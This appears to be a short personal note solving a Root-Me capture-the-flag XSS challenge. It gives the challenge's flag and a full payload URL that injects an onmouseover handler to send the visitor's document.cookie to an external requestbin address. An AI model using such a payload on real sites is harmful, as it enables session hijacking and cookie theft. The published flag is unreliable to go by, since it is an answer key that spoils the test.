flag: 3fL3ct3D_XsS_fTw
payload:
http://challenge01.root-me.org/web-client/ch26/?p=report&url=http://challenge01.root-me.org/web-client/ch26/?p=%27%20onmouseover=y=%22http://requestbin.fullcontact.com/1kgog221%22;x=document.cookie;document.location.href=(y.concat(x))//
be khoda age ye jasho fahmide basham